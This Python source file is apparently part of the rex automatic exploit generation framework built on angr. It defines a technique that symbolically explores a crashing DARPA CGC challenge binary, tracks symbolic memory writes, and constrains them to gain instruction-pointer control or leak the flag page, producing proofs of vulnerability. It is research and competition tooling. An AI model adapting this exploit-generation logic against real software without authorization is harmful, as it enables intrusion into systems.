import logging
import rex.crash
import rex.exploit.cgc.type2.cgc_type2_general
from rex import Vulnerability
from rex.exploit import CannotExploit
from ..technique import Technique

import claripy
import angr


l = logging.getLogger("rex.exploit.techniques.explore_for_exploit")


class WriteInfo(object):
    def __init__(self, addr, data, min_addr, max_addr, assigned_loc, mem_range):
        self.addr = addr
        self.data = data
        self.min_addr = min_addr
        self.max_addr = max_addr
        self.assigned_loc = assigned_loc
        self.mem_range = mem_range


class ReadInfo(object):
    def __init__(self, addr, data, min_addr, max_addr, assigned_loc, mem_range):
        self.addr = addr
        self.data_expr = data
        self.min_addr = min_addr
        self.max_addr = max_addr
        self.assigned_loc = assigned_loc
        self.mem_range = mem_range


class MemRange(object):
    def __init__(self, start_addr, assigned_start):
        self.start_addr = start_addr
        self.min_start = 0
        self.max_start = 0
        self.assigned_start = assigned_start
        self.offset_to_data = dict()
        self.all_addr_keys = {start_addr.hash()}


class AttackAddr(object):
    def __init__(self, addr, goal_start=None, goal_end=None):
        self.addr = addr
        self.goal_start = goal_start
        self.goal_end = goal_end


# so we do a lot of extra solves to check if there is an address that must be at a constant offset
# the other way would be to constrain addresses to their assigned values initially.
# however, if we have  a small out of bounds write, we could end up writing over stuff before we really want to.
# should think about that more, maybe it's BS
# todo what about shadow stack and 2 writes? or 1 write but other things to attack like a leak?
# todo what about finding how to go from ip control to more control, ie what gadget works

class SimAddressTracker(angr.state_plugins.SimStatePlugin):
    """
    This state plugin keeps track of the reads and writes to symbolic addresses
    """
    def __init__(self):
        angr.state_plugins.SimStatePlugin.__init__(self)

        # data
        self.writes = []
        self.data_loc = 0x10000
        self.reads = []
        self.mem_ranges = []
        self.addresses_written = set()
        self.addrs_to_attack = []
        self.read_replacements = dict()
        self.read_constraints = []

    def assign_write(self, addr, data, state):
        l.debug("assigning write")

        # check if it can only be assigned one address
        for mem_range in self.mem_ranges:
            # todo optimize, maybe check AST.variables
            two_nums = state.solver.eval_upto(mem_range.start_addr - addr, 2)
            if len(two_nums) == 1:
                l.debug("found a matching range for var write")
                offset = two_nums[0]
                assigned = mem_range.assigned_start-offset

                # compute the new max/min
                min_addr = (mem_range.min_start-offset) & 0xffffffff
                max_addr = (mem_range.max_start-offset) & 0xffffffff

                mem_range.all_addr_keys.add(addr.hash())
                mem_range.offset_to_data[offset] = data
                self.writes.append(WriteInfo(addr, data, min_addr, max_addr, assigned, mem_range))
                return assigned

        # okay we need to do the long solve
        min_addr = state.solver.min(addr)
        max_addr = state.solver.max(addr)
        l.debug("new write with min: %#x, max: %#x", min_addr, max_addr)

        # we didn't find a range it belongs to, we add one
        assigned = self.data_loc
        mem_range = MemRange(addr, assigned)
        mem_range.min_start = min_addr
        mem_range.max_start = max_addr
        mem_range.offset_to_data[0] = data
        self.mem_ranges.append(mem_range)
        l.debug("assigned range %#x for write to addr", assigned)
        self.data_loc += 0x10000
        self.writes.append(WriteInfo(addr, data, min_addr, max_addr, assigned, mem_range))

        # remove all the "addresses written" that fall inside the range
        self.addresses_written = set(x for x in self.addresses_written if x < min_addr or x > max_addr)

        return assigned

    # TODO this is unused
    def assign_read(self, addr, data, state):
        l.debug("assigning read")

        # check if it can only be assigned one address
        for mem_range in self.mem_ranges:
            # todo optimize, maybe check AST.variables
            two_nums = state.solver.eval_upto(mem_range.start_addr - addr, 2)
            if len(two_nums) == 1:
                l.debug("found a matching range for var read")
                offset = two_nums[0]
                assigned = mem_range.assigned_start-offset

                # compute the new max/min
                min_addr = (mem_range.min_start-offset) & 0xffffffff
                max_addr = (mem_range.max_start-offset) & 0xffffffff

                mem_range.all_addr_keys.add(addr.hash())
                self.reads.append(ReadInfo(addr, data, min_addr, max_addr, assigned, mem_range))
                return assigned

        # okay we need to do the long solve
        min_addr = state.solver.min(addr)
        max_addr = state.solver.max(addr)
        l.debug("new read with min: %#x, max: %#x", min_addr, max_addr)

        # we didn't find a range it belongs to, we add one
        assigned = self.data_loc
        mem_range = MemRange(addr, assigned)
        mem_range.min_start = min_addr
        mem_range.max_start = max_addr
        self.mem_ranges.append(mem_range)
        l.debug("assigned range %#x for read to addr", assigned)
        self.data_loc += 0x10000
        self.reads.append(ReadInfo(addr, data, min_addr, max_addr, assigned, mem_range))

        # remove all the "addresses written" that fall inside the range
        self.addresses_written = set(x for x in self.addresses_written if x < min_addr or x > max_addr)

        return assigned

    @angr.state_plugins.SimStatePlugin.memo
    def copy(self, memo):
        s = SimAddressTracker()
        s.writes = list(self.writes)
        s.reads = list(self.reads)
        s.mem_ranges = list(self.mem_ranges)
        s.addresses_written = set(self.addresses_written)
        s.addrs_to_attack = list(self.addrs_to_attack)
        s.read_replacements = dict(self.read_replacements)
        s.read_constraints = list(self.read_constraints)
        return s


class ExploreForExploit(Technique):

    name = "explore_for_exploit"

    applicable_to = ['cgc']

    cgc_registers = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

    FLAG_PAGE = 0x4347c000

    bitmask_threshold = 20

    generates_pov = True

    # this technique could create pov's of either type
    pov_type = None

    def __init__(self, crash, rop, shellcode):
        super(ExploreForExploit, self).__init__(crash, rop, shellcode)

    @staticmethod
    def _get_writable_pages(state):
        last_addr = -1
        curr_start = -1
        ranges = []
        for page_num, page in sorted(state.memory._pages.items(), key=lambda x:x[0]):
            if not state.solver.eval(page.permission_bits) & 0x2:
                continue
            page_addr = page_num*0x1000
            if page_addr != last_addr:
                if last_addr != -1:
                    ranges.append((curr_start, last_addr))
                curr_start = page_addr
            last_addr = page_addr + 0x1000
        if last_addr != -1:
            ranges.append((curr_start, last_addr))
        return ranges


    @staticmethod
    def is_writable_and_mapped(addr, state):
        try:
            permissions = state.solver.eval(state.memory.permissions(addr))
            return (permissions & 2) != 0
        except KeyError:
            return False
        except angr.SimMemoryError:
            return False

    @staticmethod
    def mem_write_hook(state):
        addr = state.inspect.mem_write_address
        # length = state.inspect.mem_write_length  # seems to be None
        expr = state.inspect.mem_write_expr

        if any(v.startswith("sim_mem") for v in addr.variables):
            l.warning("Found possible arbitrary write. To be implemented.")
            #TODO

        # well this is expensive but I want to know the range
        two_addrs = state.solver.eval_upto(addr, 2)
        if len(two_addrs) == 0:
            l.warning("no solutions while trying to get 2 addrs")
            return
        if not state.solver.symbolic(addr) or len(two_addrs) == 1:
            state.get_plugin("address_tracker").addresses_written.add(two_addrs[0])
            return

        # todo how symbolic is the data, do we care?

        converted = state.get_plugin("address_tracker").assign_write(addr, expr, state)
        state.inspect.mem_write_address = converted

    @staticmethod
    def exit_hook(state):
        exit_target = state.inspect.exit_target
        if any(v.startswith("sim_mem") for v in exit_target.variables):
            l.debug("found possible target to overwrite at ip %#x", state.solver.eval(state.regs.ip))
            for v in exit_target.variables:
                if v.startswith("sim_mem"):
                    addr = int(v.replace("sim_mem_", "").split("_")[0], 16)
                    a_addr = AttackAddr(addr)
                    state.get_plugin("address_tracker").addrs_to_attack.append(a_addr)
                    break

    @staticmethod
    def syscall_hook(state):
        syscall_name = state.inspect.syscall_name
        if syscall_name == "transmit":
            # todo do we care about count
            # count = state.solver.eval(state.regs.edx)
            buf = state.regs.ecx
            fd = state.solver.eval(state.regs.ebx)
            if fd != 0 and fd != 1:
                l.warning("weird fd value: %d", fd)
                return
            for v in buf.variables:
                if v.startswith("sim_mem"):
                    addr = int(v.replace("sim_mem_", "").split("_")[0], 16)
                    a_addr = AttackAddr(addr,
                                        goal_start=ExploreForExploit.FLAG_PAGE,
                                        goal_end=ExploreForExploit.FLAG_PAGE+0x500)
                    state.get_plugin("address_tracker").addrs_to_attack.append(a_addr)
                    l.debug("found possible addr to attack to leak: %#x", addr)
                    break
        # could maybe do stuff with receive too?
        # also could look for stuff like strcpy where we can eventually concretize the result from the output

    def mem_read_hook_after(self, state):
        addr = state.inspect.mem_read_address
        data = state.inspect.mem_read_expr
        concrete_addr = state.solver.eval(addr)
        writable = self.is_writable_and_mapped(concrete_addr, state)
        # TODO maybe the right way is to create a new path and re-execute each time we see one of these
        # todo 2 modes re-execute for every possible thing read, or re-execute only if a mem-loc goes to ip
        # check if it's writable and has not been overwritten
        if writable and concrete_addr not in state.get_plugin("address_tracker").addresses_written and \
                len(state.get_plugin("address_tracker").writes) > 0 and \
                any(write.min_addr <= concrete_addr <= write.max_addr
                    for write in state.get_plugin("address_tracker").writes):
            # get a variable representing that memory loc
            replacement = state.solver.BVS("sim_mem_" + hex(concrete_addr).replace("L",""), len(data))
            state.inspect.mem_read_expr = replacement

            state.add_constraints(replacement == data)

            state.get_plugin("address_tracker").read_constraints.append(replacement == data)
            state.get_plugin("address_tracker").read_replacements[replacement.hash()] = data

    @staticmethod
    def addr_analyze(addr, state):
        if not state.solver.symbolic(addr):
            return addr
        # well this is expensive but I want to know the range
        min_addr = state.solver.min(addr)
        max_addr = state.solver.max(addr)
        if min_addr == max_addr:
            return addr
        return addr

    def which_bytes_2(self, out_data):
        byte_map = dict()
        for i, byte in enumerate(out_data.chop(8)):
            # we only handle the simple stuff
            # TODO dump to colorguard
            if len(byte.variables) == 1 and byte.op == "BVS":
                byte_index = int(list(byte.variables)[0].split("_")[0].split("-")[-1])
                byte_map[i] = byte_index
        curr = -1
        best_length = 0
        best_start = -1
        prev = -1
        # iterate +1 to handle the end of the loop for free
        for i in range(out_data.size()//8 + 1):
            if i in byte_map and (prev == -1 or byte_map[i]-1 == prev):
                if curr == -1:
                    curr = i
                prev = byte_map[i]
            else:
                if curr != -1:
                    length = i - curr
                    if length > best_length:
                        best_start = curr
                        best_length = length
                curr = -1
                prev = -1

        if best_start == -1:
            return None
        return best_start

    def attack(self, path, write_addrs, initial_state):
        # todo replace warning/return None with exception that is caught and printed
        # todo split up this function
        l.debug("attacking path %s at addrs %s", path, [hex(x.addr) for x in write_addrs])
        addrs = path.history.bbl_addrs.hardcopy
        initial_state = initial_state.copy()
        addr_tracker = path.get_plugin("address_tracker").copy()
        # initial_state.register_plugin("address_tracker", path.get_plugin("address_tracker").copy())
        # TODO how to do this, follow same path? explore? dump for the crash fuzzer?

        # add the read constraints so we can use the symbolic variables from the previous run
        for c in addr_tracker.read_constraints:
            initial_state.add_constraints(c)

        # FIXME what about looking at all the writes we have, and what they overwrite? like we would prefer a 4 byte
        # FIXME write over a return address than an 8 byte write that kills a canary
        # TODO we should consider ranges when picking writes, and try to avoid overwriting non-const values
        # TODO maybe we need to look at other ways of doing this, overwrite size, overwriting an additional regsiter
        # TODO what about writes that are concretized by concretizing the first write?

        # pick writes
        exploit_type = 0
        for write_addr in write_addrs:
            found = False
            for write in list(addr_tracker.writes):
                if write.min_addr <= write_addr.addr <= write.max_addr:
                    l.debug("trying to satisfy write")
                    if initial_state.solver.satisfiable(extra_constraints=(write.addr == write_addr.addr,)):
                        if write_addr.goal_start is None:
                            l.debug("found a satisfiable write for addr %#x", write_addr.addr)
                            initial_state.add_constraints(write.addr == write_addr.addr)
                            found = True
                            exploit_type = 1
                        else:
                            constraints = list()
                            # todo we should concretize this further, it's a huge range of values...
                            constraints.append(write.addr == write_addr.addr)
                            constraints.append(write.data >= write_addr.goal_start)
                            constraints.append(write.data <= write_addr.goal_end)
                            if initial_state.solver.satisfiable(extra_constraints=constraints):
                                found = True
                                initial_state.add_constraints(*constraints)
                                initial_state.add_constraints(write.data == initial_state.solver.eval(write.data))
                                exploit_type = 2
                        if found:
                            # remove all writes/reads from the same mem_range
                            addr_tracker.writes = [a for a in addr_tracker.writes if a.mem_range != write.mem_range]
                            addr_tracker.reads = [a for a in addr_tracker.reads if a.mem_range != write.mem_range]
                            found = True
                            break
            if not found:
                l.warning("couldn't write to addr %#x", write_addr.addr)
                return None

        if exploit_type == 0:
            exploit_type = 1

        # use up the rest of the writes and reads
        l.debug("%d writes remaining", len(addr_tracker.writes))
        l.debug("%d reads remaining", len(addr_tracker.reads))
        # todo the extra addresses
        # todo consider the end size + the region as a whole
        # todo maybe want to aim somewhere past in case of cheap ASLR
        remaining = addr_tracker.writes + addr_tracker.reads

        writable_ranges = self._get_writable_pages(initial_state)
        for addr in remaining:
            constraint = initial_state.solver.Or(*(initial_state.solver.And(r[0] <= addr.addr, addr.addr < r[1]) for r in writable_ranges))
            initial_state.add_constraints(constraint)

        if not initial_state.solver.satisfiable():
            return None

        l.debug("Running batch eval")
        try:
            solns = initial_state.solver._solver.batch_eval(tuple(addr.addr for addr in remaining), 1)
        except claripy.UnsatError:
            return None

        if len(solns) == 0:
            l.warning("couldn't point them all at writable locations :(")
            return None

        # now add the exact constraints
        soln = solns[0]
        for concrete, addr in zip(soln, remaining):
            initial_state.add_constraints(concrete == addr.addr)

        # todo wtf do I do about unicorn. Maybe only track branches with a symbolic guard??
        # todo pt.2 do we still need to discard unicorn now that we're being smart about it
        last_checked = 0
        initial_state.options.discard(angr.options.UNICORN)

        def check_path(state):
            suffix = state.history.recent_bbl_addrs
            return suffix != addrs[last_checked:last_checked+len(suffix)]

        pg = self.crash.project.factory.simulation_manager(initial_state, save_unconstrained=True)
        prev = None
        # todo do we really want to follow the same path? maybe
        while len(pg.active) > 0 and len(pg.one_active.history.bbl_addrs.hardcopy) < len(addrs):
            l.debug("light-tracing: %s", pg.active)
            pg.move('active', 'missed', check_path)
            if len(pg.active) == 0:
                l.warning("WTF misfollow error")
                return None

            prev = pg.active[0]
            last_checked += len(prev.history.recent_bbl_addrs)
            pg.step()

        # create exploit
        if len(pg.unconstrained) == 0 and exploit_type == 1:
            # TODO signal failure or success
            l.warning("attack failed, simgr: %s", pg)
            return None
        elif exploit_type == 2:
            # we need to step one more to have the flag in stdout
            pg.step()
            pg.prune()
            if len(pg.active) == 0:
                l.warning("Error: no paths made it")
                return None
            stdout_len = pg.active[0].posix.fd[1].write_pos
            out_data = pg.active[0].posix.fd[1].write_storage.load(0, stdout_len)
            # verify flag data is in stdout
            if not any(v.startswith("cgc-flag") for v in out_data.variables):
                l.warning("Error: flag data not in stdout")
                return None

            # craft leaking exploit
            start = self.which_bytes_2(out_data)
            if start is None:
                return None
            l.debug("making crash object")
            crash_state = pg.active[0]
            crash = rex.crash.Crash(self.crash.target, crash=self.crash.crash_input, pov_file=self.crash.pov_file,
                                    crash_state=crash_state, prev_state=prev, rop_cache_path=self.crash._rop_cache_path)
            exploit = rex.exploit.cgc.type2.cgc_type2_general.CGCType2GeneralExploit(
                    method_name='exploration', crash=crash, input_str=crash_state.posix.dumps(0),
                    output_index=start, bypasses_nx=True, bypasses_aslr=False)
            self.pov_type = 2
            return exploit

        crash_state = pg.unconstrained[0]
        # hack to avoid exploring again!
        crash_state.globals["DONT_EXPLORE"] = True
        l.debug("making crash object")
        crash = rex.crash.Crash(self.crash.target, crash=self.crash.crash_input, pov_file=self.crash.pov_file,
                                crash_state=crash_state, prev_state=prev, rop_cache_path=self.crash._rop_cache_path)
        try:
            exploit_factory = crash.exploit()
            if exploit_factory.best_type1 is not None:
                self.pov_type = 1
                return exploit_factory.best_type1
            if exploit_factory.best_type2 is not None:
                self.pov_type = 2
                return exploit_factory.best_type2
        except CannotExploit as e:
            l.warning("could not exploit: %s", e)

        l.debug("didn't succeed")
        return None

    def check(self):
        if not self.crash.one_of(Vulnerability.WRITE_WHAT_WHERE):
            self.check_fail_reason("Can only apply explore for exploit technique to ip overwrite vulnerabilities.")
            return False

        if "DONT_EXPLORE" in self.crash.state.globals:
            self.check_fail_reason("Already explored this crash.")
            return False

        return True

    def apply(self, **kwargs):
        # TODO figure out why I need to go back this far to be before the crash
        # TODO While executing keep things as variables that were read from memory with a constraint that it is equal
        # TODO then we try removing the constraint if it is ever used for a control flow transfer
        # TODO might need to reexecute with the constraint removed, might have constraints on memory e.g. there is a call before where we jump

        initial_state = self.crash._t.predecessors[-2].copy()
        initial_state.history.trim()

        # remove preconstraints
        initial_state.preconstrainer.remove_preconstraints()

        # Todo think about this more...
        # remove flag constraint
        new_constraints = [c for c in initial_state.solver.constraints
            if not (c.op == '__eq__' and c.args[0].op == 'BVS' and not c.args[1].symbolic and
                len(c.variables) == 1 and next(iter(c.variables)).startswith('cgc-flag'))
            and not (c.op == '__eq__' and c.args[1].op == 'BVS' and not c.args[0].symbolic and
                len(c.variables) == 1 and next(iter(c.variables)).startswith('cgc-flag'))
        ]

        initial_state.release_plugin('solver')
        initial_state.add_constraints(*new_constraints)
        l.debug("downsizing unpreconstrained state")
        initial_state.downsize()
        l.debug("simplifying solver")
        initial_state.solver.simplify()
        l.debug("simplification done")
        initial_state.solver._solver.result = None
        # done removing

        start_state = initial_state.copy()
        start_state.release_plugin("zen_plugin")
        start_state.release_plugin("chall_resp_info")
        start_state.options.discard(angr.options.CGC_ZERO_FILL_UNCONSTRAINED_MEMORY)
        start_state.options.add(angr.options.TRACK_JMP_ACTIONS)
        # start_state.inspect.b(
        #        'address_concretization',
        #        angr.BP_BEFORE,
        #        action=self.addr_concretization)

        # set some breakpoints
        start_state.inspect.b(
            'mem_write',
            angr.BP_BEFORE,
            action=self.mem_write_hook
        )

        start_state.inspect.b(
            'mem_read',
            angr.BP_AFTER,
                action=self.mem_read_hook_after
        )

        start_state.inspect.b(
            'exit',
            angr.BP_BEFORE,
            action=self.exit_hook
        )

        start_state.inspect.b(
            'syscall',
            angr.BP_BEFORE,
            action=self.syscall_hook
        )

        # force it to only pick one address
        start_state.memory._default_read_strategy = ["any"]
        start_state.memory._default_write_strategy = ["any"]


        # todo wtf do I do about unicorn. Maybe only track branches with a symbolic guard??
        try:
            start_state.options.discard(angr.options.UNICORN)
        except AttributeError:
            pass

        # remove lazy solves
        start_state.options.discard(angr.options.LAZY_SOLVES)

        # add the plugin
        start_state.register_plugin("address_tracker", SimAddressTracker())

        # make sure solver doesn't solve for long
        start_state.solver._solver.timeout = 15000

        pg = self.crash.project.factory.simulation_manager(start_state, save_unconstrained=True)
        step_num = 0
        while len(pg.active) > 0:
            pg.step()
            step_num += 1
            if step_num % 10 == 0:
                l.debug("stepping %s", pg)

            for x in pg.active + pg.deadended + pg.unconstrained + pg.errored:
                for addr in x.get_plugin("address_tracker").addrs_to_attack:
                    exploit = self.attack(x, [addr], initial_state.copy())
                    if exploit is not None:
                        return exploit
                # reset the list of addrs to attack
                x.get_plugin("address_tracker").addrs_to_attack = []
            for x in pg.unconstrained:
                # TODO make tests
                # we've found an unconstrained path simply by not messing something up
                # here we can attack it by constraining addrs to not be bad
                exploit = self.attack(x, [], initial_state.copy())
                if exploit is not None:
                    return exploit
            for x in pg.errored:
                l.warning("errored path: %s", x.error)
            pg.drop(stash="unconstrained")
            pg.drop(stash="deadended")
            del pg.errored[:]

        l.warning("out of paths!")
        # here we will try to save the idea of control that we have
        # and see if we can use it later?

        # okay I want to single step up until the crashing action
        # then track the crashing action and see when it can be used
